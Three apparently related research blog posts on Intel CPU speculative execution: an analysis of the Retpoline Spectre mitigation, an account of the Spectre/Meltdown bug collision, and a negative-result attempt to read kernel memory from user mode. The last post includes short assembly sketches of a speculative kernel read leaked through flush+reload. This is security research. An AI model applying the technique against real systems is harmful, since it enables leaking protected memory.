In debt to Retpoline

Appendix was added on the 14th of Febuary 2018, in response to comments made to me on twitter. In this connection “retpoline pause lfence” and “retpoline ud2” was added to the table. Other than that only typos where fixed since original post.

Abstract

In this blog post I explore the Retpoline mitigation that Paul Turner of Google suggested for the Spectre indirect branch variant issue [1]. A short differential side channel analysis is made along with a performance analysis. The impact of the use of a pause instruction in retpoline is discussed. Finally I consider the technical debt leveraged on CPU developers of a widely deployed retpoline.

How does retpoline work

This section follows the google presentation of retpoline closely [1]. I included it because it provides the context for the remainder of this blog post. A jmp rax is turned into the following code:

call set_up_target;
capture_spec:
pause;
jmp capture_spec
set_up_target:
mov [rsp],rax
ret;

call set_up_target (1) pushes the address of capture_spec(2) to the return stack buffer (RSB, cpu internal buffer used to predict returns). It also pushes the address of capture_spec(2) to the program stack and transfers control to set_up_target (5). The mov [rsp],rax overwrites the return stack address on the program stack, so that any subsequent returns will pop the stack and return to the original target in its architectural path. The speculative path of the return remains the value from the RSB and thus the CPU will speculatively execute the code starting at (2). The pause instruction is meant to relinquish pipeline resources to co-located hyperthreads and save power if no co-located hyperthreads are present. The jmp in line 4 continues to repeat the pause until the speculative execution is rolled back when the ret in line 7 finished executing.

In simple terms this means the speculative path will resolve to a spinlock thus not leak any information through a side channel. The architectural path will eventually resolve correctly and the program will run as it is supposed to.

Side channel analysis of retpoline

Retpoline’s architectural side channels consist of flushing an entry in the RSB caused by the call in line (1). This information is unlikely to bring an attacker much advantage and would require an attack to have a sufficient amount of control of the RSB. The 6th line makes a store access on the stack. This is visible through a cache side channel to an attacker — provided the attack has sufficient control. However, it is unlikely to provide much information given that the stack is usually used by the functions themselves. It is worth noting that any information this side channel can provide is also provided by the jmp rax (6). Presumably retpoline’s stack access provides slightly less information to an attacker than the original jmp rax instruction – i.e. BTB indexing bits vs. cache set indexing bits. The 7th line is more tricky: if the CPU updates the BTB after a misprediction, the BTB side channel will be similar useful to the original jmp rax. I think it is likely that the BTB is not updated until retirement, so that this side channel isn’t present. Since the pause instruction (line 3) is a CPU hint, the CPU may choose to take or ignore the hint at its discretion – more on this below. Thus, pause may or may not provide a side channel. If external power is plugged in and the hint is taken one can see a co-located hyperthread speed up (see [2]), which is the purpose of having the pause instruction here, but certainly a side channel as well. If the CPU is running in power saving mode (e.g. unplugged laptop), pausing provides a side channel since executing a pause instruction on two co-located hardware threads causes a delay for both, presumably through C-State interaction. See[3]. In sum, I think the side channels provided by retpoline is less valuable than the side channel provided by the original indirect branch (but is still present).

Performance analysis of retpoline

A jmp rax instruction takes about 4 clock cycles to execute and predicts correctly very often. It is replaced in retpoline with a ret instruction which will always mispredict and thus executes far slower. However, unlike doing hard serialization once the ret instruction has been executed out-of-order, the CPU seems to be able to continue without a pipeline flush and thus allowing out-of-order execution to continue. This creates two corner cases: firstly, where dependencies block out-of-order execution across the indirect branch, and secondly, when there is no dependence across the indirect branch. I managed to create a sequence of instructions where retpoline was just as fast as the original unpredicted branch – this is the case when the instructions after the branch depend on the results of the instructions before the branch. Obviously, any co-located hyperthread will be more affected by the retpoline than a predicted indirect branch, but the thread itself does not lose any cycles. At first this seems weird, but imagine completely dependant ALU integer instructions on both sides of the indirect branch – with the branch unit being completely free, both retpoline and the indirect branch will execute concurrently with the integer ALU instructions before the branch. Since the integer ALU instructions after the branch are dependant of those before the branch, they only get scheduled for execution once all prior instructions have been executed. Thus, retpoline and an indirect branch perform equally. In the case of no dependencies across the indirect branch, retpoline is slower. Retpoline will not allow the out-of-order execution to continue until the ret instruction is executed and consequently adding a penalty compared to a predicted indirect branch. In general, the longer it takes for the indirect branch to resolve, the higher the penalty of retpoline is. There is also an indirect performance cost of retpoline which – in my opinion – is likely to be somewhat smaller. The call in line 1 will push a return address onto the RSB (and consequently may evict the oldest entry in the RSB), and thus potentially causing an RSB underflow once a previous call returns. A RSB underflow will manifest itself as a negative performance impact if the evicted RSB entry causes mispredictions or stalls in unrelated code later on. For this to happen a call stack is required to be deeper than the the size of the RSB. The stall penalty of the underflow was big enough to cause Intel to add prediction to the microarchitecture (for Broadwell and Skylake). If this prediction was as efficient as using the RSB, the RSB would not exist.

The following table presents the results of my micro benchmarking:

Unit Clock cycles	Mean	Std.dev	Median
jmp rsi	350.33	95.48	346
retpoline pause	410.64	65,94	410
retpoline lfence	403.76	25,96	404
retpoline clean	402.13	19,99	402
retpoline pause lfence	406.74	64,76	404
retpoline ud2	404,29	28,70	402

The “retpoline clean” is without the pause instruction, “retpoline lfence” is where pause has been replaced with a lfence instruction. The results are generally not very stable over multiple runs but with all three versions of retpoline often ending up with an average of around 400-410 cycles and the indirect branch being around 50 clks faster on average. Thus, some additional care should be taken before concluding

that “retpoline pause” is slower than the others. I ran the tests with 100k observations and removed the slowest 10% observations in a primitive noise reduction approach. The microbenchmark is for a bad case with no dependency across the indirect branch for integer instructions (add rsi,1, add rbx, 1 respectively) and is run on a Intel i7-6700k. While microbenchmarking is important for the arguments I will put forth in this text, it is important to note that they are not reflective on the system’s performance as the incidence of indirect branches is relatively small and this benchmark is manufactured to portrait cases which are worse than in normal scenarios. Also, the microbenchmarking completely ignores any indirect effects.

The weird case of pause

It immediately seemed weird to me to have the pause instruction in the spinlock in line 3 of retpoline. Usually we have pause instructions in spinlocks, but spinlocks execute architecturally at some point. Having a pause of 10 clock cycles for Broadwell and 100 for Skylake in the spinlock potentially causes the CPU to pause the architectural flow that needs to be done before the return instruction can be executed. This may lead to a larger-than-necessary penalty to the spinlock. However, pause is not actually an instruction. It is a hint to the CPU and my guess is that the hint is not taken. I ran retpoline on my Broadwell and my Skylake and compared the penalty: there was almost no difference. This is important because we would expect the different implementation of pause to give different average latencies if it was actually executed (10 clk vs 100 clk). Another argument for pause not being executed speculatively is that pausing is connected to a VmExit. I can only guess why Intel made it is possible to get a VmExit on pause instruction. I think the most compelling reason would be to use the pause used by spinlock in a guest to process small work items in the hypervisor instead of just idling the CPU. This would probably also help virtualizing hardware. If I am right about this, it would be sensible for the pause hint actually pause only on retirement instead of pausing the CPU speculatively. Another argument is power management: the behavior of the pause instruction depends on the C-State of a co-located hyperthread. Presumably this gives us one of the two side channels as described in a previous section. There is little reason on why a CPU designer would pause a thread which is executing other instructions out-of-order.

Discussion of technical debt of retpoline

As clever as retpoline seems, I think it is fundamentally broken. Not because it does not work but instead because it builds a large amount of technical debt. Adding retpoline to a piece of software would require CPU designers to make sure that legacy software is compatible with new CPUs. If a company like Google applies retpoline in their instructure it is fairly unproblematic, Google has a nice inventory of software running on their systems and they can make sure that software applied to new CPUs is recompiled and consequently this poses no constraints on a CPU designer. However, if we add retpoline to a compiler we can be sure it will be added to all kinds of software including virtual machines, containers, specialized software etc. These pieces of software often do not remain supported, they are poorly catalogued and consequently, if the behavior of retpoline changes significantly, these systems may perform suboptimal, be unsafe or even completely break. This effectively ties the hands of CPU designers as they strive to improve the CPU in the future.

The first concrete problem I see is the use of the pause hint: regardless of whether the pause hint is taken in retpoline or not, its non-intended use in retpoline ties the behavior of this instruction down for CPU designers in future generations of CPUs. It is worth noting here that we have at least 3 different implementations of the pause hint in different CPUs already (treated as nop, stall 10 clks, stall 100 clks)[5]. Adding to that the complexity of the instruction I outlined above, it would be fair to assume that this instruction might need changes in future generations of CPUs. Thus, having the pause hint in retpoline in scattered over software everywhere might turn out to be a bad idea thinking long term. The good news here is that there probably is a good solution for this. Replacing the pause instruction with lfence will serialize the speculative path and probably even stop it from looping; effectively stopping the execution of the spinlock may free up resources for co-located hyperthread as well as branch execution units for the main thread that otherwise would have been tied up by the jmp instruction in line 4. I ran some test on Skylake and found very near identical performance results for pause and lfence, suggesting that this is viable solution. It is important to note that the lfence instruction was previously documented to only serialize loads. But instead it silently serialized all instructions — which is now the documented behavior since Intel published their errata documents for the Spectre/Meltdown patches [7]. So, the mortgage on lfence is small and has already been signed.

The second concrete problem I see is the construct which repoline uses to direct speculative execution into the spinlock is a much bigger problem. On Skylake, return instructions predict by using the indirect branch predictor, requiring Skylake to be handled differently than other CPUs. The problem is twofold: on the one hand, the very common ret instruction needs to be replaced with retpoline (or other non-speculative branching), and on the other hand, the hardware interrupt raised in line 6 may underflow the RSB in the interrupt handler. Thus, repoline is already potentially unsafe on some CPUs (in my opinion much less than without retpolinie though). The technical debt here is that retpoline may be completely unsafe if future CPUs stop relying on the RSB for return prediction. There may be many reasons for a CPU designer to change this. For example a completely unified system for indirect branches or prediction of monotonic returns (returns with only one return address). The latter will keep the RSB save from non-monotonic returns if the RSB underflows and thus may perform better when there are deep call stacks. I do not know whether these things are good ideas, but retpoline might effectively rule them out. Also, one could imagine conflicts with future CPU-based control-flow integrity systems, etc.

One could argue that performance optimization rely on microarchitecture details all the time, but there is an important difference between breaking a performance optimization and a security patch. Already we see problems with updating broken libraries amongst software vendors, it’s not difficult to imagine what would happen if a secure software becomes insecure because of CPU evolution.

Instead of taking on technical debt potentially forever, I suggest we use either a less secure option (i.e. lfence ahead of indirect branches) or a more expensive option such as IPBP [7] or replacing indirect calls with iret (which is documented to be serializing). That constitutes a high price now, but avoids paying rent on technical debts in perpetuity.

Conclusion

Retpoline is an effective mitigation for Spectre variants which rely on causing misprediction on indirect branches on some CPUs. From a pure side channel perspective retpoline adds a different side channel but it is an improvement over the side channel of a traditional indirect branch nonetheless. Retpoline’s performance penalty is complex, but likely smaller than the penalty of the serializing alternatives. However, as Retpoline relies on assumptions about the underlying microarchitecture, it adds technical debt if used widely. If Google, Microsoft or whoever with software-deployment management wants to use it, they have my blessing but there is reasons for scepticism if it is a good idea to have it in general purpose compilers. CPU Vendor’s short term marketing deficits should not lead us to trade small short term performance gains causing technical debt to be paid back with interest in the future for a more complex microarchitecture.

Appendix added 14th of Febuary 2018

Stephen Checkoway of University of Illinois at Chicago commented that it might be worth testing an ud2 instruction in the speculative executed spinlock. I find this idea promising because ud2 essentially just throws an “invalid opcode” exception and thus abusing it for retpoline is likely to produce equivalent performance to that of lfence, perhaps even better, Further, it’s unlikely that using this instruction is associated with any technical debt. The simple test result here shows that the direct performance impact is approximately similar (see table above) that of the other versions of the spinlock.

Some implemented versions of retpoline uses a pause followed by an lfence instruction. I added this to the performance table as well. Thanks to Khun Selom & @ed_maste (twitter account).

Literature

[1] Turner, Paul. “Retpoline”. https://support.google.com/faqs/answer/7625886

[2] Fogh, Anders. “Two covert channels”. https://cyber.wtf/2016/08/01/two-covert-channels/

[3] Fogh, Anders “Covert Shotgun”. https://cyber.wtf/2016/09/27/covert-shotgun/

[4]Intel, “Intel® 64 and IA-32 Architectures Software Developer Manual: Vol 3”

.https://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-system-programming-manual-325384.html

[5] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[6] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.

[7] Intel, “Speculative Execution and Indirect Branch Prediction Side Channel Analysis Method”, https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr

Behind the scenes of a bug collision

Introduction

In this blog post I’ll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPU’s concurrently. The conclusion is that the bug was ripe because of a years long build up of knowledge about CPU security, carried out by many research groups. I’ll also detail the rough story behind the research that let me to the bug. My story is probably different than that of the other researchers, but while unique, I am relatively sure that it’s the same for all researchers on most security issues: security research is a long haul thing. The remainder of this blog post is semi-technical.

Why did we get a bug collision on Spectre/Meltdown?

This is of course my take on the event, my personal story, which I’ll detail below. Research collision in CPU research isn’t that uncommon. In fact, the story of my friendship with Daniel Gruss is about a series of collisions. In 2015 I was preparing a talk about row hammer for Black Hat with Nishat Herath [2] when Daniel tweeted that he was able to flip bits from Javascript. I didn’t want to have questions I couldn’t answer, so I started researching it and literally the evening before Daniel published how he was doing it, I knew how he did it. Later Daniel teased me about detecting cache side channels if there were no L3 cache misses. I replied ‘are you timing Clflush?’ He was indeed. You’ll find me being acknowledged in the paper for this reason [1]. I told him he shouldn’t worry about me competing on publishing it, because I was doing research on a side channel in the row buffer and didn’t have time to compete on Clflush. Turns out he and the wu cache clan were too. I blogged it, and wu cache clan wrote a paper on it in Pessl et al. [3]. You’ll find me acknowledged here as well. Not long after that, I did a blog post on breaking KASLR with the prefetch instruction. Obviously, Daniel was doing the exact same thing again. We had enough of competition and started my by now a regular collaboration with the WU cache clan after that point.

So why do things like this happen? (Granted, the story about Daniel is a freaky one.) Well, CPU research is much like drawing a map of an uncharted world. Researchers start from known research and proceed into the unknown, and if they find something, they document it and add it to the map. This essentially means that the frontier looks very similar to everybody leading people into the same paths. This processed is very much sustained by the fact that almost all research in this area is academic and academia is much better organized in terms of recording and documenting than hackers.

For a thing like meltdown, the real foundation was laid with the work on cache side channels sometime back around 2005. There are many papers from this time, I’ll mention Percival [4] because it’s my favorite. Another milestone paper was Yuval Yarom’s paper on Flush+reload [5]. Note that Yuval is also partial to the Spectre paper. With this foundation, a subgenre of papers emerged in 2013 with Hund, Willems & Holz [6]. They essentially noticed that when an unprivileged user tries to read kernel mode memory, the CPU actually does a great part of the read process before making an error, allowing a user to observe not the data of the kernel, but the layout of the kernel – this is known as a KASLR break and is important for classical exploits. This work was followed up with improvements including Gruss et al [7] and Yang et al [8]. Both papers showed that a lot more work was being done by the CPU than was strictly needed when an unprivileged user accesses kernel memory – an important prerequisite for Meltdown to exist. Also in 2016, another KASLR break using branches from Evtuishkin et al. emerged[9]. They didn’t try to read from the kernel but rather found that branch prediction leaked information. This is important because branch prediction is a precursor for speculative execution and thus build a bridge towards Meltdown. Felix Wilhelm [11] extended Evtuishkin et al. [9] to extend to hypervisors which are likely to be important in the rationale for hypervisors being affected. In fact, I think Jann Horn mentioned this blog post as an inspiration. There where other works, like that of Enrique Nissim[11] which showed that the KASLR breaks real-world applications with a classic exploit. Also in 2016, some work was being done on side channels in the pipeline. My Covert Shotgun blog post is an example of this literature[12]. To sum it up, by the end of 2016 it was known that unprivileged reads from user mode to kernel mode did more processing than was strictly required, it was known that branches were important, and there was work going on examining the pipeline. In end effect, the Meltdown bug was surrounded on all sides. It was a single blind spot on the map – obviously, nobody knew that there’d actually be a bug in this blind spot and I think most did not believe such as bug existed. Other people would probably pick other papers and there where many. My point remains: a lot of people moved towards this find over a very long period of time.

The personal perspective
I work for GDATA Advanced Analytics and there I work in an environment that is very friendly and supportive of research. Without research, a consultant company like ours cannot provide excellence for their customers. However, CPU bugs don’t pay the bills, so my day job does not have much to do with this. I spend my time helping customers with their security problems: malware analysis, digital forensics, and incident response being the main tasks that I do on a day to day basis. This means that the bulk of the work I do on CPUs is done in my spare time after hours.

So my story with Meltdown and Spectre starts essentially at Black Hat 2016 where Daniel Gruss and I presented our work on the prefetch instruction. The video of our talk can be found here [13]. As described above, this work slowly gave me this fuzzy feeling that maybe this work is just the tip of the iceberg. In fact did a blog post about the meta’s on breaking KASLR in October 2016 [14] and presented it at RuhrSec 2017 [15], so I was very well acquainted with that literature. Meanwhile, I wanted to get away from working with caches and accidentally found some covert channels and wrote about them[16]. I thought there might be more and started picking apart the pipeline in search of covert channels. My frustration led me to automate finding covert channels which resulted in this blog post [12] and later this talk at HackPra [17]. In the talk, you can hear that I’m still frustrated “I don’t care, I’ll just use a shotgun”. To this day I have many unanswered questions about the pipeline..
Later that year I met up with the WU Cache Clan at CCS where we were presenting the academic version of the prefetch KASLR break[7]. We had some beer-fueled conversations. The conversations were added upon at Black Hat Europe (Michael Schwarz and I did a talk on the row buffer side channel we’d done concurrent work on) where I started believing that meltdown might be possible, but yet without a clue as to how it could possibly work.

I finally made the connection to speculative execution on December 2016/January 2017 when I prepared the presentation for HackPra about Covert Shotgun[17]. There are a lot of slides about speculative execution. At first, I didn’t think about reading kernel memory. My first “attack” was just another attack on KASLR. Essentially it was Hund, Willems, Holz in a speculative version- the work never really got finished (timing inside of speculative execution is possible, but not easy – I did not find a solution to this problem until much later) the rationale for doing this work is that it would solve a problem with their method and do this stuff in my spare time – fun is essential and this sounded like fun. So my project name for Meltdown was “undead KASLR”, despite me quickly figuring out there was bigger fish to be fried. I told my friend Halvar Flake about the weird ideas while presenting at IT-Defense in February and his encouragement was a big part of me actually continuing, because I didn’t believe it would work.

In March, I had the first chance to do some real work on the project during a small get away from work to present Jacob Torrey’s and my work on PUFs (the work was really mostly Jacobs – and not related to Meltdown per se) at Troopers 17. I researched mornings in the hotel and even did some research during other people’s talks. Fun fact: there is s a video of me doing a spectre-style attack POC on the code I’d added to Alex Ionescu’s wonderful Simplevisor. Hi Alex! I’m the bald head seen to the lower left of the center isle doing weird head movements and packing away my laptop as I succeeded at around 19 minutes into the video. The second half of the talk was pretty awesome btw!!

Later in March 2017, I visited Daniel, Michael, and Clementine Maurice in Graz to work on a common project we had on detecting double fetch bugs with a cache attack (which became this paper [21]. Here I tried to pitch my idea, because with the workload I had I knew it would be difficult for me to realize alone. Unfortunately, I wasn’t the only one fully booked out and Daniel, Michael and myself were super skeptical at that time, despite the slight encouragement I’d had at Troopers. So we decided to finish the stuff we were already doing first. Might I add here that Daniel and Michael did some really cool stuff since then? Struggling with work and making a sufficient contribution to the double fetch paper the project was on ice. The main reason why my name is so far back on the paper is that I didn’t have time to pull my weight.

After Troopers, I didn’t get much done and was really frustrated about it. So in July, I started back up again in the evenings. It helped me immensely that my climbing partner suffered an injury giving me a bit more time. This time around I was working targeted at Meltdown. I were doing stuff much too complicated at first and wasted a lot of time on that. Then I tried to simple things up as much as I could and this is why I ended up with a negative result. I wrote up the blog on company time on a Friday before noon before leaving early on a vacation. Luca Ebach helped proof read it. If he hadn’t it would’ve been unreadable and Tomasulo would’ve been spelled wrong.. The “Pandoras box” part of the blog post is a reference to the limited and unfinished stuff I did on “Spectre”, which I was sure would work at the time, but needed checking before I’d commit to blogging about it. While on vacation, I decided to wrap things up in an academic paper and with some positive results in my hands, seek help from some academic professionals. So I have continued my research afterward, after all you don’t open Pandora’s box without looking what is inside. In light of recent events, I shall not be publishing the rest of the stuff I did.

The stuff that Jann Horn did, is really really awesome, the same goes for the Spectre/Meltdown papers. It is wonderful to see that I was barking up the right tree. It is important to me to mention that Jann Horn reported his research prior to my blog post and did not have access to mine prior to that date.

Literature

[1] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.
[2] Nishat Herath, Anders Fogh. “These Are Not Your Grand Daddy’s CPU Performance Counters” Black Hat 2015, https://www.youtube.com/watch?v=dfIoKgw65I0
[3] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.
[4] Percival, Colin. “Cache missing for fun and profit.” (2005).

[5] Yarom, Yuval, and Katrina Falkner. “FLUSH+ RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX Security Symposium. 2014.
[6] Hund, Ralf, Carsten Willems, and Thorsten Holz. “Practical timing side-channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013.
[7] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[8] Jang, Yeongjin, Sangho Lee, and Taesoo Kim. “Breaking kernel address space layout randomization with intel tsx.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[9] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.
[10] Wilhelm, Felx. “Mario Baslr”, https://github.com/felixwilhelm/mario_baslr
[11] Nissim, Enrique. “I Know Where Your Page Lives: De-randomizing the Windows 10 Kernel”. https://www.youtube.com/watch?v=WbAv2q9znok
[12] Fogh, Anders. “Covert Shotgun”, https://cyber.wtf/2016/09/27/covert-shotgun/
[13] Fogh, Anders, Gruss, Daniel. “Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process” Black Hat 2016.
[14] Fogh, Anders, “Micro architecture attacks on KASLR”,https://cyber.wtf/?s=kaslr
[15] Fogh, Anders. “Micro architecture attacks on KASLR and More”, https://www.youtube.com/watch?v=LyiB1jlUdN8
[16] Fogh, Anders, “Two covert channels”, https://cyber.wtf/2016/08/01/two-covert-channels/
[17[ Fogh, Anders, “Covert Shotgun”, https://www.youtube.com/watch?v=oVmPQCT5VkY&t=34s, Hack Pra 2017
[18] Schwarz, Michael, Fogh, Anders. “Drama: how your DRAM becomes a security problem”. Black Hat Europe 2016 https://www.youtube.com/watch?v=lSU6YzjIIiQ
[19] Ionescu, Alex, “SimpleVisor” https://github.com/ionescu 007/ “
[20] Neilson, Graeme, “Vox Ex Machina”, Troopers 17. https://www.youtube.com/watch?v=Xrlp_uNBlSs&t=1145s
[21] Schwarz, Michael, et al. “Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features.” arXiv preprint arXiv:1711.01254 (2017).
[22] Fogh, Anders. “Negative result: reading kernel memory from user mode” https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

Negative Result: Reading Kernel Memory From User Mode

I were going to write an introduction about how important negative results can be. I didn’t. I assume you can figure out for yourself why that is and if not you got all the more reason to read this blog post. If you think it’s trivial why my result is negative, you definitely need to read the blog post.

The memory subsystem

I think most researchers would immediately think that reading kernel memory from an unprivileged process cannot work because “page tables”. That is what the Instruction Set Architecture or ISA says. But in order to understand why that was unsatisfactory to me we need to dig a bit deeper and I’ll start at the beginning.

When a software running on a Core requires memory it starts a so called “load” command. The load command is then processed in multiple stages until the data is found and returned or an error occurred. The Figure below shows a simplified version of this sub system.

Memory hierachy.png

Software including operating system uses virtual addressing to start a load (which is what a memory read is called inside the CPU). The first stage of processing is the L1 cache. The L1 cache is split between a data and an instruction cache. The L1 Cache is a so called VIPT or Virtually Indexed, Physically Tagged cache. This means the data can be looked up by directly using the virtual address of the load request. This along with central position in the core makes the L1 incredibly fast. If the requested data was not found in the L1 cache the load must be passed down the cache hierarchy. This is the point where the page tables come into play. The page tables are used to translate the virtual address into a physical address. This is essentially how paging is enabled on x64. It is during this translation that privileges are checked. Once we have a physical address, the CPU can query the L2 cache and L3 cache in turn. Both are PITP caches (Physically Indexed, Physically Tagged) thus requiring the translation in the page tables before the lookup can be done. If no data was in the caches then the CPU will ask the memory controller to fetch the data in main memory. The latency of a data load in the L1 cache is around 5 clock cycles whereas a load from main memory is typically around 200 clock cycles. With the security check in the page tables and the L1 located before those we see already at this point that the because “page table” argument is too simple. That said – the intel manuals software developer’s manuals [2] states that the security settings is copied along the data into the L1 cache.

Speculative execution

In this and the next section I’ll outline the argumentation behind my theory, but only outline. For those a bit more interested it might be worth looking at my talk at HackPra from January [3] where I describe the pipeline in slightly more detail, though in a different context. Intel CPU’s are super scalar, pipelined CPU’s and they use speculative execution and that plays a big role in why I thought it may be possible read kernel memory from an unprivileged user mode process. A very simplified overview of the pipeline can be seen in figure below.

The pipeline starts with the instruction decoder. The instruction decoder reads bytes from memory, parse the buffer and output instructions. Then it decodes instructions into micro ops. Micro ops are the building blocks of instructions. It is useful to think of x86 CPU’s as a Complex Instruction Set Computer (CISC) with a Reduced Instruction Set Computer (RISC) backend. It’s not entirely true, but it’s a useful way to think about it. The micro ops (the reduced instructions) are queued into the reordering buffer. Here micro ops is kept it until all their dependencies have been resolved. Each cycle any micro ops with all dependencies resolved are scheduled on available execution units in first in ,first out order. With multiple specialized execution units many micro ops are executing at once and importantly due to dependencies and bottlenecks in execution units micro ops need not execute in the same order as the entered the reorder buffer. When a micro op is finished executing the result and exception status are added to the entry in the reorder buffer thus resolving dependencies of other micro ops. When all Micro ops belonging to a given instruction has been executed and have made it to the head of the reorder buffer queue they enter the retirement processing. Because the micro ops are at the head of the reorder buffer we can be sure that retirement is in the same order in which the micro ops were added to the queue. If an exception was flagged in the reorder buffer for a micro op being retired an interrupt is raised on the instruction to which the micro op belonged. Thus the interrupt is always raised on the instruction that caused even if the micro op that caused the interrupt was executed long before the entire instruction was done. A raised interrupt causes a flush of the pipeline, so that any micro op still in the reorder buffer is discarded and the instruction decoder reset. If no exception was thrown, the result is committed to the registers. This is essentially an implementation of Tomasulo’s algorithm [1] and allows multiple instructions to execute at the same time while maximizing resource use.

Abusing speculative execution

Imagine the following instruction executed in usermode

mov rax,[somekernelmodeaddress]

It will cause an interrupt when retired, but it’s not clear what happens between when the instruction is finished executing and the actual retirement. We know that once retired any information it may or may not have read is gone as it’ll never be committed to the architectural registers.. However, maybe we have a chance of seeing what was read if Intel relies perfectly on Tomasulo’s algorithm. Imagine the mov instruction sets the results in the reorder buffer as well as the flag that retirement should cause an interrupt and discard any data fetched. If this is the case we can execute additional code speculatively. Imagine the following code:

mov rax, [Somekerneladdress]

mov rbx, [someusermodeaddress]

If there are no dependencies both will execute simultaneous (there are two execution units for loads) and while the second will never get it’s result committed to the registers because it’ll be discarded when the firsts mov instruction causes an interrupt to be thrown. However, the second instruction will also execute speculatively and it may change the microarchitectural state of the CPU in a way that we can detect it. In this particular case the second mov instruction will load the

someusermodeaddress

into the cache hierarchy and we will be able to observe faster access time after structured exception handling took care of the exception. To make sure that the someusermodeaddress is not already in the cache hierarchy I can use the clflush instruction before starting the execution. Now only a single step is required for us to leak information about the kernel memory:

Mov rax, [somekerneladdress]

And rax, 1

Mov rbx,[rax+Someusermodeaddress]

If this is executed last two instructions are executed speculatively the address loaded differs depending on the value loaded from somekerneladdress and thus the address loaded into the cache may cause different cache lines to be loaded. This cache activity we can we can observe through a flush+reload cache attack.

The first problem we’re facing here is we must make sure the second and third instruction runs before the first one retires. We have a race condition we must win. How do we engineer that? We fill the reorder buffer with dependent instructions which use a different execution unit than the ones we need. Then we add the code listed above. The dependency forces the CPU to execute one micro op at a time of the filling instructions. Using an execution unit different than the one we used in the leaking code make sure that the CPU can speculatively execute these while working on the fill pattern.

The straight forward fill pattern I use is 300 add reg64, imm. I choose add rax, 0x141. I chose this because we have two execution units that are able to execute this instruction (Integer alus) and since they must execute sequentially one of these units will always be available to my leakage code (provided that another hardware thread in the same core isn’t mixing things up).

Since my kernel read mov instruction and my leaking mov instruction must run sequentially and that the data fetched by the leaking instruction cannot be in the cache the total execution time would be around 400 CLK’s if not the kernel address isn’t cached. This is a pretty steep cost given that an add rax, 0x141 cost around 3 CLK’s. For this reason, I see to it that the kernel address I’m accessing is loaded into the cache hierarchy. I use two different methods to ensure that. First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1. Gruss et al [4] concluded that prefetch instructions may load the cache despite of not having access rights. Further they showed that it’s possible for the page table traverse to abort and that would surely mean that I’m not getting a result. But having the data already in L1 will avoid this traverse.

All said and done there are a few assumptions I made about Intels implementation of Tomasulo’s algorithm:

1) Speculative execution continues despite interrupt flag

2) I can win the race condition between speculative execution and retirement

3) I can load caches during speculative execution

4) Data is provided despite interrupt flag

Evaluation

I ran the following tests on my i3-5005u Broadwell CPU.

I found no way I could separately test assumption 1,2 and 3. So I wrote up the code I outlined above and instead of code above I used the following code:

Mov rdi, [rdi]; where rdi is somekernelmodeaddress

mov rdi, [rdi + rcx+0]; where rcx is the Someusermodeaddress

Then I timed accessing the Someusermodeaddress after an exception handler dealt with the resulting exception. I did 1000 runs and sorted out the 10 slowest out. First I did a run with the 2nd line above present with the value at the kernel mode address 0. I then did a second run with the second line commented out. This allows me test if I have a side channel inside the speculative execution. The results is summarized in the below histogram (mean and variance respectively: mean= 71.22 std = 3.31; mean= 286.17 std = 53.22). So obviously I have a statistic significant covert channel inside the speculative execution.

In a second step I made sure that the kernel address I was trying to read had the value 4096. Now if I’m actually reading kernelmode data the second line will fetch a cache line in the next page. Thus I would expect a slow access to Someusermodeaddress. As the speculative fetch should access a cache line exactly one page further. I selected the offset 4096 to avoid effects due to hardware prefetchers I could’ve added the size of a cache line. Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed. I double checked by accessing the cache line I wanted to access and indeed that address was not loaded into the cache either. Consequently it seems likely that intel do process the illegal reading of kernel mode memory, but do not copy the result into the reorder buffer. So at this point my experiment is failed and thus the negative result. Being really curious I added an add rdi,4096 instruction after the first line in the test code and could verify that this code was indeed executed speculatively and the result was side channeled out.

Pandoras box

While I did set out to read kernel mode without privileges and that produced a negative result, I do feel like I opened a Pandora’s box. The thing is there was two positive results in my tests. The first is that Intel’s implementation of Tomasulo’s algorithm is not side channel safe. Consequently we have access to results of speculative execution despite the results never being committed. Secondly, my results demonstrate that speculative execution does indeed continue despite violations of the isolation between kernel mode and user mode.

This is truly bad news for the security. First it gives microarchitecture side channel attacks additional leverage – we can deduct not only information from is actually executed but also from what is speculatively executed. It also seems likely that we can influence what is speculative executed and what is not through influencing caches like the BTB see Dmitry Evtyushkin and Dmitry Ponomarev [5] for instance.It thus add another possibility to increase the expressiveness of microarchitecture side channel attacks and thus potentially allow an attacker even more leverage through the CPU. This of cause makes writing constant time code even more complex and thus it is definitely bad news.

Also it draws into doubt mitigations that rely on retirement of instructions. I cannot say I know how far that stretches, but my immediate guess would be that vmexit’s is handled on instruction retirement. Further we see that speculative execution does not consistently abide by isolation mechanism, thus it’s a haunting question what we can actually do with speculative execution.

Literature

[1] Intel® 64 and IA-32 Architectures Software Developer Manuals. Intel. https://software.intel.com/en-us/articles/intel-sdm

